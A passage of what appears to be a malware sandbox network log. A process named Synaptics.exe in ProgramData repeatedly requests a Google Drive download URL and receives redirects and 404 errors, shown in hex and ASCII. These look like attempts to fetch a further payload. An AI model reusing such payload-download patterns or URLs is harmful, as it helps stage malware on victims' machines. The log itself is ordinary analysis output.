                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    124192.168.2.949912142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:03 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:03 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4QxqiKOkZuS-UvkoUG3LrBF6IJSTDA_d9Dg18Kr_G9yeCRdvSQ_Ar5BfGXbGjJOVn8
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:03 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-gT_lwTRXHIZ-OxIsoXAMiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:26:03 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:26:03 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 46 63 75 74 53 78 4d 52 5f 6c 66 33 61 42 64 4a 52 4d 56 72 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="ZFcutSxMR_lf3aBdJRMVrA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:26:03 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    125192.168.2.949913142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:03 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:03 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:03 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-9jEbwLHbhitn7YfdSv8aYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    126192.168.2.949914142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:03 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:03 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6AfcXctw8OgvHTp0-bdh0lww4MbiM-dLV7SO4RBu8-O1T-QgFuZMF0R-jpMaiPp78a
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:03 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-e69MbAD3XGAf34Zo2TYf2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:26:03 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:26:03 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 41 62 41 48 42 74 6d 64 48 66 6b 5a 5a 4f 67 5f 2d 55 70 31 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="wAbAHBtmdHfkZZOg_-Up1Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:26:03 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    127192.168.2.949916142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:04 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:04 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:04 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Ea8rJS7BmOWkCqSky_A4XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    128192.168.2.949917142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:04 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:04 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7VWe34AD78lPHMwQg7A1Tp3wGgJ7RG__3hoWE_iAhMeqWH6cHmGLnI74VSUWJK_vjp
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:04 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-xugerl6kd424cCCaLfYDtA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:26:04 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:26:04 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 31 5a 6a 5f 33 4a 53 74 67 73 52 71 73 33 4a 6c 71 57 58 63 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="A1Zj_3JStgsRqs3JlqWXcw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:26:04 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    129192.168.2.949918142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:04 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:04 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:04 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-5buCT6IpocGL-028MK_xsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    130192.168.2.949919142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:04 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:04 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7L1mCsmc44ZvaSkVv1FsBpRw8pzGV1Zu7V6Feze5ZGhpV9Ah9zrUXpxuR4ZotRFgr0
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:04 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-pLjXBePujxr5eJvcEacDFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:26:04 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
